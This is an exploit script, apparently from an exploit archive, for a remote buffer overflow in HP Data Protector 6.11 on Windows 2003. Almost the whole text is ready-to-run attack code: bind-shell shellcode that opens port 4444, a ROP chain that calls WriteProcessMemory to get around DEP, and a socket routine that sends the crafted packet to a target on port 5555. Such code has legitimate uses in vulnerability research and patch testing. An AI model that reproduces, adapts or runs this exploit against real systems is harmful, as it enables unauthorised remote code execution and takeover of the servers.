HP Data Protector 6.11 - Remote Buffer Overflow (DEP Bypass)

#!/usr/bin/python
# HP Data Protector 6.11 Remote Buffer Overflow
# Tested on Windows 2003 R2 + DEP Enabled
# Authors: muts & dookie
# Reference: http://www.exploit-db.com/exploits/17458/
# Reference: http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities
# http://www.offensive-security.com/0day/hp-dataprotector.py.txt

import struct, socket, sys
target = sys.argv[1]

# bindshell - port 4444
shellcode = ("\xbf\x83\x75\x7f\xdd\xdb\xc8\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x56\x31\x7e\x13\x03\x7e\x13\x83\xee\x7f\x97\x8a\x21\x97\xd1"
"\x75\xda\x67\x82\xfc\x3f\x56\x90\x9b\x34\xca\x24\xef\x19\xe6"
"\xcf\xbd\x89\x7d\xbd\x69\xbd\x36\x08\x4c\xf0\xc7\xbc\x50\x5e"
"\x0b\xde\x2c\x9d\x5f\x00\x0c\x6e\x92\x41\x49\x93\x5c\x13\x02"
"\xdf\xce\x84\x27\x9d\xd2\xa5\xe7\xa9\x6a\xde\x82\x6e\x1e\x54"
"\x8c\xbe\x8e\xe3\xc6\x26\xa5\xac\xf6\x57\x6a\xaf\xcb\x1e\x07"
"\x04\xbf\xa0\xc1\x54\x40\x93\x2d\x3a\x7f\x1b\xa0\x42\x47\x9c"
"\x5a\x31\xb3\xde\xe7\x42\x00\x9c\x33\xc6\x95\x06\xb0\x70\x7e"
"\xb6\x15\xe6\xf5\xb4\xd2\x6c\x51\xd9\xe5\xa1\xe9\xe5\x6e\x44"
"\x3e\x6c\x34\x63\x9a\x34\xef\x0a\xbb\x90\x5e\x32\xdb\x7d\x3f"
"\x96\x97\x6c\x54\xa0\xf5\xf8\x99\x9f\x05\xf9\xb5\xa8\x76\xcb"
"\x1a\x03\x11\x67\xd3\x8d\xe6\x88\xce\x6a\x78\x77\xf0\x8a\x50"
"\xbc\xa4\xda\xca\x15\xc4\xb0\x0a\x99\x11\x16\x5b\x35\xc9\xd7"
"\x0b\xf5\xb9\xbf\x41\xfa\xe6\xa0\x69\xd0\x91\xe6\xa7\x00\xf2"
"\x80\xc5\xb6\xe5\x0c\x43\x50\x6f\xbd\x05\xca\x07\x7f\x72\xc3"
"\xb0\x80\x50\x7f\x69\x17\xec\x69\xad\x18\xed\xbf\x9e\xb5\x45"
"\x28\x54\xd6\x51\x49\x6b\xf3\xf1\x00\x54\x94\x88\x7c\x17\x04"
"\x8c\x54\xcf\xa5\x1f\x33\x0f\xa3\x03\xec\x58\xe4\xf2\xe5\x0c"
"\x18\xac\x5f\x32\xe1\x28\xa7\xf6\x3e\x89\x26\xf7\xb3\xb5\x0c"
"\xe7\x0d\x35\x09\x53\xc2\x60\xc7\x0d\xa4\xda\xa9\xe7\x7e\xb0"
"\x63\x6f\x06\xfa\xb3\xe9\x07\xd7\x45\x15\xb9\x8e\x13\x2a\x76"
"\x47\x94\x53\x6a\xf7\x5b\x8e\x2e\x07\x16\x92\x07\x80\xff\x47"
"\x1a\xcd\xff\xb2\x59\xe8\x83\x36\x22\x0f\x9b\x33\x27\x4b\x1b"
"\xa8\x55\xc4\xce\xce\xca\xe5\xda")

wpm = "\x55\x23\xe4\x77"        # 77E42355 WriteProcessMemory - Win2k3  
wpm += "\x50\xd0\x4b\x00"       # 004bd050 omniinet.exe - Return after WPM  
wpm += "\xff\xff\xff\xff"       # hProcess  
wpm += "\x50\xd0\x4b\x00"       # 004bd050 omniinet.exe - Address to Patch  
wpm += "\x41\x41\x41\x41"       # lpBuffer placeholder (Shellcode Address)  
wpm += "\x42\x42\x42\x42"       # nSize placeholder (Shellcode Size)  00001000
wpm += "\x38\xd4\x4b\x00"       # 004BD438 omniinet.exe - Pointer for Written Bytes  

# pre
packet = ("\x00\x00\x27\xCA\xFF\xFE\x32\x00\x00\x00\x20\x00\x61\x00\x00\x00"
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00"
"\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x32\x00\x30\x00\x00\x00"
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00"
"\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00"
"\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00")

# padding to EIP
packet +="A"* 2004
# Get a copy of ESP into a register for safekeeping
packet +="\x1f\x59\x37\x7c" # 0x7c37591f  PUSH ESP # ADD EAX,DWORD PTR DS:[EAX] # ADD CH,BL # INC EBP # OR AL,59 # POP ECX # POP EBP # RETN
packet += "\x44" * 4  # junk to pop into EBP

# Jump over the WPM parameters
packet += "\xfe\x9b\x35\x7c"  # 0x7c359bfe :  # ADD ESP,20 # RETN 
packet += wpm
packet += "\x44" * 4   # filler

# Get EAX to point at our shellcode on the stack and overwrite the placeholder
packet += "\x40\xa0\x35\x7c"  # 0x7c35a040 :  # MOV EAX,ECX # RETN  
packet += "\x1c\x3b\x37\x7c"  # 0x7c373b1c :  # ADD EAX,100 # POP EBP # RETN
packet += "\x44" * 4  # filler
packet += "\xd4\x3d\x43\x00"  # 0x00433dd4 :  # MOV DWORD PTR DS:[ECX+18],EAX # POP EBP # RETN    ** [omniinet.exe]
packet += "\x44" * 4  # filler

# Craft the shellcode size in EAX and overwrite the placeholder
packet += "\x2e\x40\x34\x7c"  # 0x7c34402e :  # POP EDX # RETN    ** [MSVCR71.dll]
packet += "\x59\x3d\x41\x41"  #  Value to SUB from EAX 
packet += "\x23\x62\x37\x7c"  # 0x7c376223 :  # POP EAX # RETN    ** [MSVCR71.dll]
packet += "\x41\x41\x41\x41"  # To be the sub-ee 41413D59
packet += "\xe9\xfa\x36\x7c"  # 0x7c36fae9 :  # SUB EAX,EDX # POP ESI # RETN    ** [MSVCR71.dll]
packet += "\x44" * 4  # filler
packet += "\x69\x60\x37\x7c"  # 0x7c376069 :  # MOV DWORD PTR DS:[ECX+1C],EAX # POP EDI # POP ESI # POP EBX # RETN    ** [MSVCR71.dll]
packet += "\x44" * 12  # filler

# Point ESP to WPM and the stack and return
packet += "\x40\xa0\x35\x7c"  # 0x7c35a040 :  # MOV EAX,ECX # RETN    ** [MSVCR71.dll]
packet += "\x66\x61\x43\x00"  # 0x00436166 :  # ADD EAX,2 # POP EBP # RETN    ** [omniinet.exe]
packet += "\x44" * 4  # filler
packet += "\x66\x61\x43\x00"  # 0x00436166 :  # ADD EAX,2 # POP EBP # RETN    ** [omniinet.exe]
packet += "\x44" * 4  # filler
packet += "\x66\x61\x43\x00"  # 0x00436166 :  # ADD EAX,2 # POP EBP # RETN    ** [omniinet.exe]
packet += "\x44" * 4  # filler
packet += "\x66\x61\x43\x00"  # 0x00436166 :  # ADD EAX,2 # POP EBP # RETN    ** [omniinet.exe]
packet += "\x44" * 4  # filler
packet += "\x05\x8b\x34\x7c"  # 0x7c348b05 :  # XCHG EAX,ESP # RETN    ** [MSVCR71.dll]
packet += "\x45" * 8
packet +="\x90" *120
packet += shellcode
packet +="C"* 980000
# post
packet +=("\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00"
"\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00"
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00"
"\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00"
"\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00"
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00")

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((target, 5555))
sock.send(packet)
sock.close()